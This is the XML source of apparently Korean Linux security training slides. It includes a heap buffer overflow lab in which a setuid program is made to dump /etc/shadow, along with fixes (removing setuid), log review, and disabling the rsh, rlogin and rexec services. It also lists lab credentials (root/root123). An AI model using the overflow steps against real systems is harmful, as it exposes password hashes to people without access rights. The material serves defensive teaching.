              <a:tr h="25290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strcpy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실행 후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힙의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구조는 다음과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buf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버퍼 시작 주소로부터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문자가 복사되며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buf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버퍼의 시작 주소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+ 112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B’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복사된다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68446"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="59393" name="_x603817952">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{266AA15A-B8BA-445A-9A33-16961264F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7" y="4473906"/>
            <a:ext cx="4593352" cy="180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3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{76E22925-E979-45D6-8626-2DA803E7A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0" t="1826" r="101" b="451"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6311741" y="862012"/>
            <a:ext cx="49053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5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{28A9FE55-DBD5-4F0D-A63F-B2351D7BB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741" y="2811778"/>
            <a:ext cx="4934204" cy="2746629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DC8520-7C1E-43E7-84E9-467C287FDD75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3523E35-2AE8-4E01-8F25-6D62F827C39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5DA178-FFF2-4F20-95AD-779D82BC8AD3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화살표: 오른쪽 14">
              <a:hlinkClick r:id="" action="ppaction://noaction"/>
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{25D482AD-1BDB-4B00-840E-53F5B98BEC9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4762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8) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>위의 공격 결과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$ cat 2.txt</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US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7321A60-9A8B-4DCF-B6BE-E0B5E85C5327}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="513016" y="490569"/>
          <a:ext cx="5049584" cy="2686495"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="5049584">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3417638965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645710"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="2203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strcpy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실행 후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힙의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구조는 다음과 같다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509503"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="60417" name="_x609432040">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B8A00DFC-BC0A-404C-A5D1-E832A2A53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10" y="1092518"/>
            <a:ext cx="4811713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7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{696B1E8A-1EFD-4FFC-BD3E-A7127DA4D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16" y="3608229"/>
            <a:ext cx="4992116" cy="275920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C682B9-F1E2-456F-BB10-FF556080591D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6183086" y="368998"/>
            <a:ext cx="5616792" cy="612000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acheck </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>및 파일명 입력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$ acheck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/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>/etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>/shadow </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>파일 내용이 출력된 파일 이름 입력</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>위의 예제에서는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>2.txt)</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1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5316DD-2CD5-490B-83B5-C7C01B0202D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99825A1-062A-40CE-B920-CD7749C7A75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1437C5-6CDA-4FB6-8C80-D0BAD3A08F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화살표: 오른쪽 13">
              <a:hlinkClick r:id="" action="ppaction://noaction"/>
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2EADCCBE-7BBA-4A27-B14F-CB5D54F4E41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4433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보안 아이콘 이미지 검색결과">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{71EB15F0-8F52-4084-8228-4234399B1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4" t="12467" r="11967" b="12532"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="662681" y="3412409"/>
            <a:ext cx="565945" cy="5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/Training/Unit/Sys/10</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> 10. BOF –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힙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-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대응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224536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/sec/heap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파일에는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취약점이 존재한다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버퍼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오버플로우가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발생하더라도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권한이 없는 파일의 내용이 출력되지 않도록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8"/>
            <a:ext cx="4432682" cy="226028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SetUID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제거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u-s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Picture 4" descr="목표 아이콘 이미지 검색결과">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ACA32BEB-9045-401B-B976-A8DE580FE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C69DC5-6D46-4110-B092-F87162F11C2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 err="1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BOF </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US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공격을 수행할 수 있다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="8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힙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BOF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취약점에 대응할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250E706-7320-4890-B2A5-9F511E31CF36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6F75AFA-6CA9-432C-B149-D4CF8BED7C7C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21" name="Picture 8" descr="cent os 아이콘 이미지 검색결과">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2F042198-8D3B-42BA-9AB0-F321EFE2D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27DCE4-1233-4F8B-B02D-73786CA1D8E6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0414104-8B9C-4CB0-900B-F84D0564BA23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1781417-D03F-4E91-B9D9-1AF2D7095711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087AE6-366E-41AB-BDDA-0EE45619FF93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화살표: 오른쪽 24">
              <a:hlinkClick r:id="" action="ppaction://noaction"/>
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{78351B86-FFEB-4E07-95F8-5CDDE591EF0F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44175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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>/sec </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>디렉터리로 이동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cd </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>/sec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/>
              <a:t>/sec/heap </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>파일에 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>SetUID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>가 설정되어 있음을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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>l heap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3) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>/sec/heap </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>파일에서 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>SetUID </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>설정 해제 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u-s </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>/sec/heap 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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>l heap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4648275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5" name="Picture 109">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C217BE02-C249-4B5F-B814-9FDE58ECB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" t="2896"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="530224" y="1327150"/>
            <a:ext cx="3932555" cy="695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11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0A268674-ACB5-47FC-8FAB-D5A054A14C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5" t="7026"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="530224" y="2770129"/>
            <a:ext cx="3977321" cy="6588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F01A300-EBE6-4B42-B0BD-D37242AA4775}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6317137" y="498209"/>
          <a:ext cx="4932807" cy="4393375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1604440188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504514"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="39292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ASLR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활성화로는 대응이 되지 않는다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이유는 다음과 같이 두 버퍼들 간의 거리는 일정하게 유지되기 때문이다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311618"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="61441" name="_x563165400">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AC678E34-4942-49FE-B9D0-0104EB14B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81" y="1252979"/>
            <a:ext cx="3870325" cy="34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CAEABC-BB50-468C-9324-155014192660}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6183086" y="5146484"/>
            <a:ext cx="5616792" cy="134251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check </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>입력 및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  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t># check</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1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41548C-2860-4A58-B397-1C2FB1EBFC2D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8D29BBC-7933-42AE-8CC8-7D28590F6264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184F27-96AC-440B-9D1A-6ECD1FEA5C88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화살표: 오른쪽 13">
              <a:hlinkClick r:id="" action="ppaction://noaction"/>
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7A543647-2FBE-4C63-8D1D-36F3603F92C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769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/Training/Unit/Sys/2</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> 2.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시스템 로그 점검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4"/>
            <a:ext cx="4432683" cy="180000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/var/log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/secure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로그를 점검하여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root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계정으로 원격 접속을 시도한 호스트의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찾아내시오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9"/>
            <a:ext cx="4432682" cy="180000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내용 검색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grep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키워드 파일명</a:t>
            </a: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로그를 점검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endParaRPr lang="ko-KR" altLang="en-US" sz="1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B5D6D54-8014-4712-B111-84FDA5BA6AE8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6A40F11-BBF5-48DB-A768-38C602830DBE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5E013C-3CB3-44FF-8BEB-18148F542D05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96FC6158-12EB-4ADF-B786-A5D0E1D1FC31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867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/var/log</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>/secure </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>로그에서 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>root </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>검색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grep </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>root /var/log</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>/secure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※ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>192.168.174.1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>에서 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ssh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>를 통해 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>root</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>로 로그인</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>했음을 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check </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>및 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>IP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>주소 입력 후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로그에서 발견한 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>IP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>주소 입력</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13" name="Picture 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{14757363-6E3B-4AF9-B363-510E4A430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6" y="876481"/>
            <a:ext cx="5019040" cy="29006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EBFE7B-6841-478B-8867-ACE3C2831DF3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="611934" y="4114973"/>
          <a:ext cx="4932807" cy="49250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67807887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grep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1947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grep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키워드 파일명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파일에서 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="10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키워드가 포함된 행</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="10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(line)</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="10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모두 출력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09659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E94B0E58-7E52-4ACA-A830-E19D8BA5EE5D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BAC0E03-97C8-48B2-9DD4-6D17B5E5D3B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D45BFC-D44D-4A60-AF78-849417F5843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" name="화살표: 오른쪽 10">
              <a:hlinkClick r:id="" action="ppaction://noaction"/>
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BF439323-8302-463F-B615-CF9C95B97BA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819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010DBED-3ABA-4169-8A96-F92BD8C5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/Training/Unit/Sys/3</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> 3.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R-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명령어 제한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2CC12-A97B-4DB5-936F-E7C75CBB4AA0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1496053" y="3328503"/>
            <a:ext cx="4432683" cy="196706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ko-KR" altLang="en-US" sz="1200" b="1" kern="0" spc="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1200" b="1" kern="0" spc="200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent1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실습서버의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R-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(rlogin,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rsh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rexec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중지하고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수록된 호스트 정보를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4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호스트 정보 파일의 소유자 외에는 접근할 수 없도록 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US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설정하시오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pic>
        <p:nvPicPr>
          <p:cNvPr id="34" name="Picture 10" descr="question icon 이미지 검색결과">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B505F5E5-1AFC-4BE0-A2FB-19F018AC4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1" t="17407" r="19467" b="25308"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="717195" y="3461755"/>
            <a:ext cx="456918" cy="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A933898-9CDB-4360-99A0-123577882146}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr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>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ECF5A187-5DE1-4A4A-8190-F2DCF30D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354" y="3380506"/>
            <a:ext cx="586243" cy="58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901AF2-8468-4E57-A19A-D88B7F554DE3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr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6006CD-64B2-4E12-B317-9204AA016FB5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7178875" y="3313579"/>
            <a:ext cx="4432682" cy="1981990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ko-KR" altLang="en-US" sz="1200" b="1" kern="0" spc="200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4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endParaRPr lang="en-US" altLang="ko-KR" sz="1200" b="1" kern="0" spc="200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent4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계정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root / root123</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR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[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1)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텍스트 파일 편집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vi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접근 권한 변경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접근권한 파일명</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pP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재시작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service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restart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 descr="목표 아이콘 이미지 검색결과">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EF9F62EB-7866-4E3F-8A25-E78C25AC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9" y="2093753"/>
            <a:ext cx="677306" cy="6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C59BC4E-1690-4F25-A340-257E8B4DCFAD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr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ko-KR" altLang="en-US" sz="1200" b="1" kern="0" spc="200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6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200" kern="0" spc="200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent6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R-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제한 할 수 있다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8135D1-75B8-4CE8-AF52-A075050006C4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr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44678E-3E32-4375-A935-CA411D9F8F9B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr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>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3B355687-60F8-4A97-9717-DF06525177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3" b="-400"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6394394" y="2199019"/>
            <a:ext cx="499434" cy="5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04B7BD-7FFA-4CF6-8896-A184055B3CEA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr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200" b="1" kern="0" spc="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ko-KR" altLang="en-US" sz="1200" b="1" kern="0" spc="200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2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200" b="1" kern="0" spc="200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent2">
                  <a:lumMod val="7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실습 서버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Linux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(CentOS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6.4)</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1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618166-9E63-4D61-BB05-67E2EDD7002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E415D15-689F-4E27-9B8C-C8BBE51D13C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F42726-15C6-4903-9EED-3C825915EF4A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0D766A5A-57E3-4447-B6E7-1840A49E7586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246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1) rlogin </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>비활성화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/rlogin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ko-KR" altLang="en-US" sz="1000"/>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>disable </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>= no”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>를 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>disable = yes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>로 변경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* </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>변경전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   </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>   * </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>변경후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2) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>rsh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>비활성화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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>rsh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ko-KR" altLang="en-US" sz="1000"/>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>disable </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>= no”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>를 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>disable = yes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>로 변경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3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>) rexec </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>비활성화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/etc/xinetd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>.d</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>/rexec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ko-KR" altLang="en-US" sz="1000"/>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>disable </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>= no”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>를 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>disable = yes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>로 변경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4) R-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>서비스 비활성화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cat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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>rlogin /etc/xinetd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>.d</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>rsh</a:t>
            </a:r>
            <a:r>
